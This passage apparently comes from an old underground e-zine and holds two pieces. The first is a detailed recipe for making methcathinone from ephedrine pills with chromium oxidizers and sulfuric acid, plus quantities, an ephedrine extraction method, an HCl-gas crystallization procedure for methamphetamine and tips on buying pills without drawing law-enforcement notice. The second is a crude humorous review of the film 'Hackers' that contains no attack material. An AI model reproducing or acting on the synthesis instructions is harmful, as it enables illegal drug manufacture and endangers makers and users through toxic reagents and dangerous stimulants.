| made by reducing ephedrine. |
|
|
| The high produced by methcathinone is in many ways similar to |
| methamphetamine. For something so easily made and purified, it is |
| actually quite enjoyable. the main differences between the meth high and |
| the methcathinone high are length of action and body fell. With |
| methcathinone, one can expect to still get to sleep about 8 hours after a |
| large dose. On the down side, it definitely gives me the impression that |
| the substance raises the blood pressure quite markedly. This drug may not |
| be safe for people with weak hearts of blood vessels. Be warned! |
|
|
| Cat is best made using chrome in the +6 oxidation state as the |
| oxidizer. I recall seeing an article in the narco swine's Journal of |
| Forensic Science bragging about how they worked out a method for making it |
| using permanganate, but that method gives an impure product in low yields. |
| Any of the common hexavalent chrome salts can be used as the oxidizer in |
| this reaction. This list include chrome trioxide (CrO3), sodium or |
| potassium chromate (Na2CrO4), and sodium or potassium dichromate |
| (Na2Cr2O7). All of these chemicals are very common. Chrome trioxide is |
| used in great quantities in chrome plating. The chromates are used in |
| tanning and leather making. |
|
|
| To make methcathinone, the chemist starts with the water extract of |
| ephedrine pills. The concentration of the reactants in this case is not |
| critically important, so it is most convenient to use the water extract of |
| the pills directly after filtering without any boiling away of the water. |
| See the section at the beginning of Chapter 15 [I included this at the end |
| of the file] on extracting ephedrine form pills. Both ephedrine |
| hydrochloride and sulfate can be used in this reaction. |
|
|
| The water extract of 1000 ephedrine pills is placed into any |
| convenient glass container. A large measuring cup is probably best since |
| it has a pouring lip. Next, 75 grams of any of the above mentioned +6 |
| chrome compounds are added. They dissolve quite easily to form a reddish |
| or orange colored solution. Finally, concentrated sulfuric acid is added. |
| If CrO3 is being used, 21 mL is enough for the job. If one of the |
| chromates is being used, 42 mL is called for. These ingredients are |
| thoroughly mixed together, and allowed to sit for several hours with |
| occasional stirring. |
|
|
| After several hours have passed, lye solution is added to the batch |
| until it is strongly basic. Very strong stirring accompanies this process |
| to ensure that the cat is converted to the free base. Next, the batch is |
| poured into a sep funnel, and a couple hundred mLs of toluene is added. |
| Vigorous shaking, as usual, extracts the cat into the toluene layer. It |
| should be clear to pale yellow in color. The water layer should be orange |
| mixed with green. The green may settle out as a heavy sludge. The water |
| layer is thrown away, and the toluene layer containing the cat is washed |
| once with water, then poured into a beaker. Dry HCl gas is passed through |
| the toluene as described in Chapter 5 [I included this at the end of the file] |
| to get white crystals of cat. The yield is between 15 and 20 |
| grams. This reaction is scaled up quite easily. |
|
|
|
|
| CHAPTER 15 (part of it anyway) |
|
|
| P R O C E D U R E F O R O B T A I N I N G P U R E E P H E D R I N E |
| F R O M S T I M U L A N T P I L L S |
|
|
| In the present chemical supply environment, the best routes for making |
| meth start with ephedrine as the raw material. To use these routes, a |
| serious hurdle must first be overcome. This hurdle is the fact that the |
| most easily obtained source of ephedrine, the so-called stimulant or |
| bronchodilator pills available cheaply by mail order, are a far cry from |
| the pure starting material a quality minded chemist craves. Luckily, |
| there is a simple and very low profile method for separating the fillers |
| in these pills from the desired active ingredient they contain. |
|
|
| A superficial paging through many popular magazines[New Body is where |
| I found it at GNC] reveals them to be brim full of ads |
| from mail order outfits offering for sale "stimulant" or "bronchodilator" |
| pills. These are the raw materials today's clandestine operator requires |
| to manufacture meth without detection. The crank maker can hide amongst |
| the huge herd of people who order these pills for the irritating and |
| nauseating high that can be had by eating them as is. I have heard of a |
| few cases where search warrants were obtained against people who ordered |
| very large numbers of these pills, but I would think that orders of up to |
| a few thousand pills would pass unnoticed. If larger numbers are |
| required, maybe one's friends could join in the effort. |
|
|
| The first thing one notices when scanning these ads is the large |
| variety of pills offered for sale. When one's purpose is to convert them |
| into methamphetamine, it is very easy to eliminate most of the pills |
| offered for sale. Colored pills are automatically rejected because one |
| does not want the coloring to be carried into the product. Similarly, |
| capsules are rejected because individually cutting open capsules is just |
| too much work. Bulky pills are to be avoided because they contain too much |
| filler. The correct choice is white cross thins, preferably containing |
| ephedrine HCl instead of sulfate, because the HCl salt can be used in more |
| of the reduction routes than can the sulfate. |
|
|
| Once the desired supply of pills is in hand, the first thing which |
| should be done is to weigh them. This will give the manufacturer an idea |
| of how much of the pills is filler, and how much is active ingredient. |
| Since each pill contains 25 milligrams of ephedrine HCl, a 1000 lot bottle |
| contains 25 grams of active ingredient. A good brand of white cross thins |
| will be around 33% to 40% active ingredient. 25 grams of ephedrine HCl |
| may not sound like much, but if it is all recovered from these pills, it |
| is enough to make from 1/2 to 3/4 ounce of pure meth. This is worth three |
| or four thousand dollars, not a bad return on the twenty odd dollars a |
| thousand lot of such pills costs. [I don't know where he got 3 or 4 |
| thousand dollars from, but the pills go for about $35.00/1000 now. 2 |
| months ago they were $25.00 but now they have to do more paper work |
| because it is a DEA controlled substance] |
|
|
| To extract the ephedrine from the pills, the first thing which must be |
| done is to grind them into a fine powder. This pulverization must be |
| thorough in order to ensure complete extraction of the ephedrine form the |
| filler matrix in which it is bound. A blender does a fine job of this |
| procedure, as will certain brands of home coffee grinders. |
|
|
| Next, the powder from 1000 pills is put into a glass beaker, or other |
| similar container having a pouring lip, and about 300 mL of distilled |
| water is added. Gentle heat is then applied to the beaker, as for example |
| on a stove burner, and with steady stirring the contents of the beaker are |
| slowly brought up to a gentle boil. It is necessary to stir constantly |
| because of the fillers will settle to the bottom of the beaker and cause |
| burning if not steadily stirred. |
|
|
| Once the contents of the beaker have been brought to a boil, it is |
| removed from the heat and allowed to settle. Then the water is poured out |
| of the beaker through a piece of filter paper. The filtered water should |
| be absolutely clear. Next, another 50 mL of water is added to the pill |
| filler sludge, and it too is heated with stirring. Finally, the pill |
| sludge is poured into the filter, and the water it contains is allowed to |
| filter through. It too should be absolutely clear, and should be mixed in |
| with the first extract. A little water may be poured over the top of the |
| filler sludge to get the last of the ephedrine out of it. This sludge |
| should be nearly tasteless, and gritty in texture. The water extract |
| should taste very bitter, as it contains the ephedrine. |
|
|
| The filtered water is now returned to the stove burner, and half of |
| the water it contains is gently boiled away. Once this much water has |
| been boiled off, precautions should be taken to avoid burning the |
| ephedrine. The best alternative is to evaporate the water off under a |
| vacuum. If this is not practical with the equipment on hand, the water |
| may be poured into a glass baking dish. This dish is then put into the |
| oven with the door cracked open, and the lowest heat applied. In no time |
| at all, dry crystals of ephedrine HCl can be scraped out of the baking |
| dish with a razor blade. The serious kitchen experimenter may wish to |
| further dry them in a microwave. |
|
|
| Chapter 5 (The part about the HCl gas) |
|
|
| A source of anhydrous hydrogen chloride gas is now needed. The |
| chemist will generate his own. The glassware is set up as in Figure 1. |
| He will have to bend another piece of glass tubing to the shape shown. It |
| should start out about 18 inches long. One end of it should be pushed |
| through a one hole stopper. A 125 mL sep funnel is the best size. The |
| stoppers and joints must be tight, since pressure must develop inside this |
| flask to force the hydrogen chloride gas out through the tubing as it is |
| generated. |
|
|
| Into the 1000 mL, three-necked flask is placed 200 grams of table |
| salt. Then 25% concentrated hydrochloric acid is added to this flask until |
| it reaches the level shown in the figure. The hydrochloric acid must be |
| of laboratory grade [I use regular muriatic acid for pools]. |
|
|
| Figure 1: |
| \ / |
| \ /ķ |
| ֽ ӷ <--125 mL separatory funnel |
| |
| |
| ӷ ֽ |
| ķ Ľ glass tubing Ŀ |
| ӷ ֽ |
| ͻ |
| stopcock->ۺĴ Salt and Hydrochloric acid |
| stopper ->ķ \/з ķ <-1 hole mixed into a paste by add- |
| ĺ ĺ stopper ing HCL to salt and mixing. |
| Ľ Ľ Ľ ķ The surface should be rough |
| ֽ ӷ and a good number of holes |
| should be poked into the |
| 1000 mL, 3 neck flask paste for long lasting |
| generation of HCl gas. |
| ӷ acid/salt level ֽ |
| ķ Ľ |
| ķ Ľ |
| ķ Ľ |
| Ľ |
|
|
|
|
| Some concentrated sulfuric acid (96-98%) is put into the sep funnel |
| and the spigot turned so that 1 mL of concentrated sulfuric acid flows |
| into the flask. It dehydrates the hydrochloric acid and produces hydrogen |
| chloride gas. This gas is then forced by pressure through the glass |
| tubing. |
|
|
| One of the Erlenmeyer flasks containing methamphetamine in solvent is |
| placed so that the glass tubing extends into the methamphetamine, almost |
| reaching the bottom of the flask. Dripping in more sulfuric acid as |
| needed keeps the flow of gas going to the methamphetamine. If the flow if |
| gas is not maintained, the methamphetamine may solidify inside the glass |
| tubing, plugging it up. |
|
|
| Within a minute of bubbling, white crystals begin to appear in the |
| solution, More and more of them appear as the process continues. It is an |
| awe-inspiring sight. In a few minutes, the solution becomes as thick as |
| watery oatmeal. |
|
|
| It is now time to filter out the crystals, which is a two man job. |
| The flask with the crystals in it is removed from the HCl source and |
| temporarily set aside. The three-necked flask is swirled a little to |
| spread around the sulfuric acid and then the other Erlenmeyer flask is |
| subjected to a bubbling with HCl. While this flask is being bubbled, the |
| crystals already in the other flask are filtered out. |
|
|
| The filtering flask and Buchner funnel are set up as shown in figure |
| 2. The drain stem of the buchner funnel extends all the way through the |
| rubber stopper, because methamphetamine has a nasty tendency to dissolve |
| rubber stoppers. This would color the product black. A piece of filter |
| paper covers the flat bottom of the Buchner funnel. The vacuum is turned |
| on and the hose attached to the vacuum nipple. Then the crystals are |
| poured into the Buchner funnel. The solvent and uncrystallized |
| methamphetamine pass through the filter paper and the crystals stay in the |
| Buchner funnel as a solid cake. About 15 mL of solvent is poured into the |
| Erlenmeyer flask. the top of the flask is covered with the palm and it is |
| shaken to suspend the crystals left clinging to the sides. This is also |
| poured into the Buchner funnel. Finally, another 15 mL of solvent is |
| poured over the top of the filter cake. |
|
|
|
|
| Figure 2: |
| Ŀ |
| <-Bchner Funnel |
| ___________ |
| \ / |
| \ / |
| \ / |
| Ŀ |
| <--To vacuum |
| Ŀ |
| |
| |
| Ŀ |
| Filtering |
| flask--> |
| |
| |
|
|
|
|
| Now the vacuum hose is disconnected and the Buchner funnel, stopper |
| and all, is pulled from the filtering flask. All of the filtered solvent |
| is poured back into the erlenmeyer flask it came from. It is returned to |
| the HCl source for more bubbling. The Buchner funnel is put back into the |
| top of the filtering flask. It still contains the filter cake of |
| methamphetamine crystals. It will now be dried out a little bit. The |
| vacuum is turned back on, the vacuum hose is attached to the filtering |
| flask, and the top of the Buchner funnel is covered with the palm or |
| section of latex rubber glove. The vacuum builds and removes most of the |
| solvent from the filter cake. This takes about 60 seconds. The filter |
| cake can now be dumped out onto a glass or China plate (not plastic) by |
| tipping the Buchner funnel upside-down and tapping it gently on the plate. |
|
|
| And so, the filtering process continues, one flask being filtered |
| while the other one is being bubbled with HCl. Solvent is added to the |
| Erlenmeyer flask to keep their volumes at 300 mL. Eventually, after each |
| flask has been bubbled for about seven times, no more crystal will come |
| out and the underground chemist is finished. |
|
|
| If ether was used as the solvent, the filter cakes on the plates will |
| be nearly dry now. With a knife from the silverware drawer, the cakes are |
| cut into eighths. They are allowed to dry out some more then chopped up |
| into powder. If benzene was used, this process takes longer. Heat lamps |
| may be used to speed up this drying, but no stronger heat source. |
|
|
| [The above section of chapter 5 is talking about methamphetamine. You |
| could, in most instances, substitute the word methcathinone, but I wanted |
| to present the text to you in its exact form.] |
|
|
|
|
| ------------------------------------------------------------------------------ |
|
|
|
|
| Review of "HACKERS" |
|
|
| By Wile Coyote |
|
|
| Sorry, it might be a little long... cut it to ribbons if you want, most |
| of it is just a rant anyway... Hope you enjoy it. |
|
|
| First off, I have to admit that I was biased going into the movie |
| "Hackers"... I heard that it wasn't going to be up to snuff, but did I |
| let that stop me? No, of course not... I sucked up enough courage to |
| stride towards my girlfriend and beg for seven bucks... :) She ended up |
| wanting to see the movie herself (and sadly, she rather enjoyed it... |
| oh, well, what can you do with the computer illiterate or is it the |
| computer illegitimate?). Now onto.... |
|
|
| THE MOVIE |
|
|
| (Yes, I AM going to give you a second-by-second playback of the |
| movie... you don't want me to spoil the plot, you say? Well, don't |
| worry, there is no plot to spoil! :) just kidding, go see it... maybe |
| you'll like it...) |
| |
| Well, from the very first few seconds, I was unimpressed... It begins |
| with an FBI raid on some unsuspecting loose (who turns out to be the |
| main character, but that's later) named Zero Cool (can you say "EL1EEEEET |
| WaReZ D00D!!!!!!!1!!!!!111!!!!"). The cinematography was bad... (Hey, |
| cinematography counts!) But, the acting was worse. The Feds bust into |
| this home and run up the stairs, all while this lady (the mom) just kind |
| of looks on dumbfounded and keeps saying stuff like "hey, stop that...", |
| or something (is this what a raid is like? I've never had the pleasure...) |
|
|
| Ok, so the story goes on like this: The 11 year old kid made a computer |
| virus that he uploads to, I think, the NY stock exchange, and it crashes |
| 1,507 computers. There is a really lame court scene where the kid is |
| sentenced to 7 years probation where he can't use a computer or a |
| touch-tone phone... That was 1988... |
|
|
| Time passes... Now it's 1995, and boy have things changed (except the |
| mom... hmmm....). Now the ex-hacker is allowed to use a computer (his |
| 18th b-day) and (somehow) he is just a natural at hacking, and is (gold?) |
| boxing some TV station to change the program on television (yes, I know |
| that all of you super-el33t hackers hack into TV stations when you don't |
| like what's on Ricki Lake!). N-e-way, while hacking into their |
| super-funky system (the screen just kind of has numbers moving up and |
| down the screen like some kind of hex-editor on acid...) |
| he gets into a "hacking battle" with some other hacker called Acid Burn |
| (I don't think I have ever seen such a trippy view of the "Internet"... |
| lots of Very high-end graphics, not very realistic, but it's Hollywood...). |
| In the end, the other hacker kicks the shit out of him (he has changed |
| his handle to Crash Override now, just to be cool, i guess) and logs him |
| off the TV station. Wow, tense... cough... |
|
|
| For those of you who care, let me describe the "hacker" Crash Override: |
| He is definitely super-funky-coole-mo-d-el31t-to-the-max, 'cause he is |
| (kinda) built, and wears VERY wicky (wicky : <adjective> weird plus wacky) |
| clothes, and the CDC might have quite a bit to say about the amount of |
| leather he wears... I mean, there are limits to that kind of stuff, man! |
| And to top off his coolness, he is, like, the roller-blade king of the |
| world. (Not that hackers don't roller-blade, but he does it just Soooo |
| much cooler than I could... :) ). And yet, here's the nifty part, |
| despite all of his deft coolness, he couldn't get a girl for the life |
| of him (we all morn for him in silent prayer). |
|
|
| Ok, so now Crash is at school, and he meets Wonderchick (who is |
| EXACTLYFUCKINGLIKEHIM, and is , of course, an 3L31t hackerette... ok, she |
| is Acid Burn, the bitch who "kicked" him out of the TV station, sorry to |
| spoil the suspense). |
|
|
| Now, while at school, he wants to hook up with wonderchick, so he breaks |
| into the school's computer (it must be a fucking Cray to support all of |
| the high-end-type graphics that this dude is pulling up) and gets his |
| English(?) class changed to hers. So, some other super-d00dcool hacker |
| spots him playing around with the schools computer (it's funny how may |
| elite hackers one can meet in a new york public school...), so he |
| catches up with Crash and invites you to an elite (Oh, if you ever want |
| to see a movie where the word 3l333333333t is used, like a fucking |
| million times, then go see Hackers...) hackerz-only club, complete with |
| million-dollar virtual-reality crap and even a token phreaker trying to |
| red-box a pay-phone with a cassette recorder (never mind that the music is |
| about 197 decibels, the phone can still pick up the box tones...). |
|
|
| What follows is that Crash meets up with some seriously k-rad hackers |
| (Cereal Killer : reminds you of Mork & Mindy meets Dazed and Confused; and |
| Phantom Phreak : who reminds of that gay kid on "my so called life... |
| maybe that was him?";Lord Nikon : the token black hacker... Photographic |
| memory is his super-power). They talk about k00l pseudo-hacker shit and |
| then a l00ser warez-type guy comes up and tries to be El33t like everybody |
| else. He is just about the ONLY realistic character in the whole movie. |
| He acts JUST like a wannabe "Hiya D00dz, kan eye b k0ewl too?". He keeps |
| saying "I need a handle, then I'll be el33t!". (Why he can't just pick |
| his own handle, like The Avenging Turd or something, is beyond me... He |
| plays lamer better than the kids in Might Morphin Power Rangers... awesome |
| actor!). N-e-way, this is where the major discrepancies start. Ok, |
| first they try to "test" Lamerboy by asking him what the four most used |
| passwords are. According to the movie, they are "love, sex, god, and |
| secret". (Hmmmm.... I thought Unix required a 6-8 char. password....). |
| Somehow lamerboy got into a bank and screwed with an ATM machine four |
| states away; all of the hacker chastise him for being stupid and hacking |
| at home (If you watch the movie, you'll notice that the hackers use just |
| about every pay-phone in the city to do their hacking, no, THAT doesn't |
| look suspicious)Next they talk about "hacking a Gibson". |
| (I was informed that they WANTED to use "hacking a Cray", |
| but the Cray people decided that they didn't want THAT kind of publicity. |
| I've never heard of a Gibson in real life, though...). |
| They talk about how k-powerful the security is on a Gibson, and they say |
| that if Lamerboy can crack one, then he gets to be elite. |
|
|
| Soooooooo.... As the movie Sloooowly progresses (with a lot of Crash |
| loves Wonderchick, Wonderchick hates Crash kind of stuff) Lamerboy |
| finally cracks a Gibson with the password God (never mind a Login name or |
| anything that cool). Then the cheese begins in full force. The Gibson |
| is like a total virtual-reality thingy. Complete with all sorts of cool |
| looking towers and neon lightning bolts and stuff. Lamerboy hacks into a |
| garbage file (did I mention that the entire world is populated by Macs? |
| Oh, I didn't... well, hold on :)...). So, this sets alarms off all |
| over the place (cause a top-secret file is hidden in the garbage, see?), |
| and the main bad-guy, security chief Weasel, heads out to catch him. He |
| plays around with some neon, star-trek-console, buttons for a while, |
| then calls the "feds" to put a trace on the kid. La de da, ess catches him |
| in a second, and the kid only gets half of the file, which he hides. |
| (to spoil the suspense, yet again, the file is some kind of money getting |
| program, like the kind some LOD members wrote about a long time ago in |
| Phrack, which pulls money from each transaction and puts it into |
| a different account. Needless to say, the Security Weasel is the guy who |
| wrote it, which is why he needs it back, pronto!). |
|
|
| As we travel along the movie, the hackers keep getting busted for tapping |
| into the Gibson, and they keep getting away. The "action" heats up when |
| Wonderchick and Crash get into a tiff and they decide to have a hacking |
| contest... They go all over the city trying their best to fuck with |
| the one fed they don't like.... Brilliant move, eh? The movie kind of |
| reaches a lull when, at a party at Wonderchick's house, they see a k-rad laptop. |
| They all fondle over the machine with the same intensity that Captain Kirk |
| gave to fighting Klingons, and frankly, their acting abilities seems |
| to ask "please deposit thirty-five cents for the next three minutes". |
| It was funny listening to the actors, 'cause they didn't know shit about |
| what they were saying... Here's a clip: |
|
|
| Hey, cool, it's got a 28.8 bps modem! (Yep, a 28.8 bit modem... Not |
| Kbps, mind you :)...I wonder where they designed a .8 of a bit?) |
|
|
| Yeah! Cool... Hey what kind of chip does it have in it? |
|
|
| A P6! Three times faster than a Pentium.... Yep, RISC is the wave of |
| the future... (I laughed so hard..... Ok, first of all, it is a Mac. |
| Trust me, it has the little apple on the cover. Second it has a P6, what |
| server she ripped this out of, I dare not ask. How she got that |
| bastard into a laptop without causing the casing to begin melting is |
| yet another problem... those get very hot, i just read about them |
| in PC magazine (wow, I must be elite too). Finally, this is a *magic* P6, |
| because it has RISC coding.... |
|
|
| I kinda wished I had stayed for the credits to see the line: |
|
|
| Technical advisor None.... died on route to work...) |
|
|
| Finally they ask something about the screen, and they find out it is |
| an..... hold your breath.... ACTIVE MATRIX! ... Kick ass! |
|
|
| They do lots of nifty things with their magic laptops (I noticed that they |
| ALL had laptops, and they were ALL Macintoshes. Now, I'm not one to say |
| you can't hack on a mac, 'cause really you can hack on a TI-81 if you've |
| got the know.... but please, not EVERYONE in the fucking movie |
| has to have the exact same computer (different colors, though... there |
| was a really cool clear one).... it got really sad at the end), and they |
| finally find out what the garbage file that Lamerboy stole was, this time |
| using a hex editor/CAD program of some sort. |
|
|
| As we reach the end of the movie, the hackers enlist the help of two very |
| strangely painted phone phreaks who give the advice to the hackers to send |
| a message to all of the hackers on the 'net, and together, they all |
| kicked some serious ass with the super-nifty-virtual-reality Gibson. |
|
|
| In the end, all of the Hackers get caught except for one, who pirates all |
| of the TV station in the world and gives the police the "real" story... |
| So, the police politely let them go, no need for actually proving that the |
| evidence was real or anything, of course. |
|
|
| So, in the end, I had to say that the movie was very lacking. It seemed |
| to be more of a Hollywood-type flashy movie, than an actual documentary |
| about hackers. Yes, I know an ACTUAL movie about hacker would suck, but |
| PLEASE, just a LITTLE bit of reality helps keep the movie grounded. It |
| may have sucked less if they didn't put flashing, 64 million color, |
| fully-rendered, magically delicious pictures floating all over the screen |
| instead of just a simple "# " prompt at the bottom. With all of the |
| super-easy access to all of the worlds computers, as depicted in the movie, |
| ANYBODY can be a hacker, regardless of knowledge, commitment, or just |
| plain common sense. And that's what really made it suck... |
|
|
| Hope you enjoyed my review of HACKERS! |
|
|
| |
|
|
|
|